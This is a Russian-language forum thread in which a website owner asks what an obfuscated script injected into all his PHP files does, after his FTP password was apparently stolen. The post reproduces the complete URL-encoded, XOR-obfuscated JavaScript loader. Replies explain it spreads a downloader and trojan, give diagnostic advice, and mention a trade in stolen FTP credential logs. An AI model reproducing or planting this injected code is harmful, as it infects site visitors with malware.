К php скриптам прикрутили код?, Что он делает?

[pashin]

К php скриптам прикрутили код?, Что он делает?

Ко всем скриптам прикрутили такой код. Что он делает?
Провайдер (.masterhost) все свел к тому, что я утратил пароль доступа по FTP.
Но такая фигня уже второй раз, и пароли после каждого раза я меняю.

<!--[Q]--><script>document.write(unescape("%3Cscript%3Eif%28dn%21%3D1%29%7Bfunction%20By%28lX%29%7Breturn%20lX%7Dtry%7Bvar%20te%3D%27qquqouqMuq3uq5uqBuqIuqeuqTuqmuqOuqguq6uqXuqauqcuqfuqruqRuqbuqUuqyuqGuq4uqnuqtuqkuqKuqSuqHuqAuqYuq7uqpuqxuqzuqDuqduqJuqwuqLuqNuqZuqFuqiuq9uq8uqVuqhuqWuqjuqPuqluqCuoquoouoMuo3uo5uoBuoIuoeuoTuomuoOuoguo6uoXuoauocuofuoruoRuobuoUuoyuoGuo4%27%2CFG%3DBy%28%27u%27%29%3Bvar%20Bc%3DArray%28wZ%28%27165%27%29%2CwZ%28%27234%27%29%2CwZ%28%27250%27%29%2CwZ%28%27235%27%29%2CwZ%28%27240%27%29%2C2590%5E2807%2C27232%5E27277%2CwZ%28%27167%27%29%2C2968%5E2919%2C14331%5E14103%2C22878%5E22953%2C1757%5E1579%2C32696%5E32513%2CwZ%28%27223%27%29%2CwZ%28%27177%27%29%2CwZ%28%27209%27%29%2C30911%5E30825%2C4016%5E3845%2C10958%5E10757%2C30174%5E29975%2CwZ%28%27176%27%29%2C15841%5E15619%2CwZ%28%27239%27%29%2C18715%5E18915%2C27604%5E27429%2C2007%5E1907%2C3477%5E3433%2C32591%5E32673%2CwZ%28%27221%27%29%2CwZ%28%27162%27%29%2C31703%5E31551%2CwZ%28%27183%27%29%2CwZ%28%27205%27%29%2CwZ%28%27244%27%29%2C6661%5E6907%2CwZ%28%27178%27%29%2CwZ%28%27161%27%29%2CwZ%28%27175%27%29%2C12126%5E12275%2C10678%5E10527%2CwZ%28%27253%27%29%2CwZ%28%27242%27%29%2C28252%5E28391%2C11900%5E11933%2C18461%5E18627%2C3823%5E3643%2C23427%5E23369%2C3267%5E3111%2C19922%5E19717%2C12647%5E12761%2CwZ%28%27168%27%29%2C26881%5E27073%2CwZ%28%27251%27%29%2C6894%5E6703%2C7763%5E7859%2C344%5E429%2CwZ%28%27182%27%29%2CwZ%28%27180%27%29%2C16544%5E16387%2C6703%5E6807%2C21953%5E21863%2C23869%5E24063%2C1370%5E1437%2CwZ%28%27227%27%29%2CwZ%28%27160%27%29%2CwZ%28%27196%27%29%2CwZ%28%27197%27%29%2CwZ%28%27220%27%29%2C17776%5E17835%2C10005%5E10189%2CwZ%28%27170%27%29%2CwZ%28%27218%27%29%2CwZ%28%27147%27%29%2CwZ%28%27171%27%29%2CwZ%28%27172%27%29%2C7837%5E7731%2CwZ%28%27207%27%29%2C32178%5E32001%29%2CdW%3Bvar%20Bf%2CWz%3Bvar%20WN%3D%27qqqoqMq3q5qBqIqeqTqmqOqMqIq5qgqOq6qoqXqaqcqfqrqRqbqUqyq6qGq4q3q6q5qnqtqOqkqKq6qSq4qIqkqaqUqHqGq4q3q6q6qGqAqtq6qOqkqKq6qSq4qIqkqaqUqHq6qGqAqYqoqkqIq7q5qpqkqaq5qnqYqxqkqIq7q5qpqkqaqUqzqDqdqJqwqwqwqwqwqUqHq6qLqgqMqmqpqkqOqIqYqMqgqgqNq5qkq6qtq6qcqfqzqZqtqZqzqkqoqMq4qBqkqaqRqbqUqzqZqHqkqFqBq5q3qkqoqtqZqzqGqAqYqIqgqiq9q7q8qIq3q5qOqxqaqUqHq6qVqGq4q3q6qnqhqtqWqoqjqTqPqlqWqrqCqGqtqWqjqWqHqGq4q3q6oqqSqtqWqmqBqLq4qIqkqjqYqMooq4qoqoq5qMqIqkooqYqgq3qxqWqrqLqMqtqWoMqnqIqpoooMqWqHq5qTqaqLqgqMqmqpqkqOqIqYqMqgqgqNq5qkqYq5qOqLqkqFqfqTqaqnqhqzqWqtqWqzqCqGqUq6qtqto3qjqUqyqGq4q3q6qLooqnqtqLqgqMqmqpqkqOqIqYooqgqMq4qIq5qgqOqYqnqgqoqIqHqGq4q3q6qGq3qtq6qWqnqIqWqzqWqIqBo5qWqzqWoMoMqWqzqaq6qLooqnq6oBqtq6qWqWoIqWqWo5qOqbqaqUqUq6qzq6qLooqnqYq3qkqBooq4qMqkq6qaoMoeoTq4o3omqwo3oOqYo3ogoMqrqWqYqWqUqYq3qkqBooq4qMqkq6qaoMo6qYqzoMqrqWqYqWqUqzqWqYqWqzqOqbqaqUq6qzqWqYqWq6qzq6oqqSqzqLqMqHqGq4q3q6oXoaqtqLqgqMqmqpqkqOqIqYqMq3qkq4qIqkoXooqkqpqkqOqIqaqWq5qTq3q4qpqkqWqUqHoXoaqYqoqkqIocqIqIq3q5qlqmqIqkq6qaqWqoq3qMqWqrq6qGq3qUqHoXoaqYqnqkq5qxqnqIqtqJqHoXoaqYqKq5qLqIqnqtofqHoXoaqYqTq3q4qpqkoaqgq3qLqkq3q6qtq6qwqHq6qIq3oqqyq6qLqgqMqmqpqkqOqIqYqlqgqLoqqYq4qBqBqkqOqLorqnq5ooqLq6qaq6oXoaqUqHq6qoqXqaqnqhqrq6qCqGq6qUqHqVq6qMq4qIqMqnqaqkqUq6qyqLqgqMqmqpqkqOqIqYqKq3q5qIqkq6qaqWqqqnqIqpooqeqqqlqgqLoqqeqqoMqlqgqLoqqeqqoMqnqIqpooqeqWqUqHq6qLqgqMqmqpqkqOqIqYqlqgqLoqqYq4qBqBqkqOqLorqnq5ooqLq6qaq6oXoaqUqHqoqXq6qaq6qnqhqrqCqGqUq6qHqVq6qVoRqTqmqOqMqIq5qgqOq6qOqbqaqUqyq6qGq4q3q6qkq8qtobqJqrqLqnqtqZqwqjobofqJoUqdoyqDoOqwq4qlqMqLqkqTqZqHqGq4q3q6qIoGqtqZqZqHq6qTqgq3qaqKocqtqwqHq6qKocq6qqq6qkq8qHq6qKocqzqzqUq6qIoGqzqtq6qLqnqYqoqmqlqoqIq3qaq9q4qIqnqYqTooqgqgq3qaq9q4qIqnqYq3q4qOqLqgqpqaqUo4qLqnqYooqkqOqxqIqnqUqrqjqrqjqUqHq6q3qkqIqmq3qOq6qIoGqHq6qVqqoMqoqMq3q5qBqIqe%27%2Cgr%3D%27%27%3Bfunction%20wZ%28tu%29%7Breturn%20parseInt%28tu%29%7Dte%3Dte.split%28FG%29%3Bfor%20%28dW%3D0%3BdW%3CWN.length%3BdW+%3D2%29%7BWz%3DWN.substr%28dW%2C2%29%3Bfor%28Bf%3D0%3BBf%3Cte.length%3BBf++%29%7Bif%28te%5BBf%5D%3D%3DWz%29break%3B%7Dgr+%3DString.fromCharCode%28Bc%5BBf%5D%5E153%29%3B%7Ddocument.write%28gr%29%3B%7Dcatch%28Wz%29%7B%7D%7Dvar%20dn%3D1%3C/script%3E"))</script><!--[/Q]-->

 

[Mr_Max]

pashin
Мастерхост тут ни при чем.
Вирус на Вашем компе.
поиск по форуму.

 

[Sokil.Dmytro]

не лазить на фтп через проводник, не сохранять учетки в тоталах/кутеФТп/прочих_прогах. ни в коем случае не грузить проги из аси, пришедние от друзей, обновить антивирус чтобі не заражаться от сайтов на которых такой код висит.

вот эти вот штуки занимаются скачиванием и запуском даунлоадера, который потом сливает троян, вследствии чего ты учавствуешь в ДДОСе на какой нибуть хост или рекламируешь виагру и увеличители члена, кои задрали уже постоянством прихода в мой почтовый ящик.

советую поставить снифер, запустить netstat -a для обнаружения левых открытых портов, tasklist /svc для просмотра левых сервисов, или поставить троги Process Explorer иCurrPorts.

 

[ys]

pashin

Меняй все пароли на все ftp, к которым у тебя был доступ.

 

[links]

мои 5 копеек, работай под виртуалом, или лучше сам знаешь под чем

 

[Активист]

+Черный сео Ты моднимаешь чей-то сайт в поисковиках Есть даже такой бизнес, где продают сп@@@ные за сегодня пароли , доступы к FTP, порой возмешь такой лог, и видишь пароли ко всему что можно, да и в придачу, что пользователь искал в яндексе ))) Интересные вещи узнаешь

 

[Найч]

порой возмешь такой лог

продаешь или покупаешь?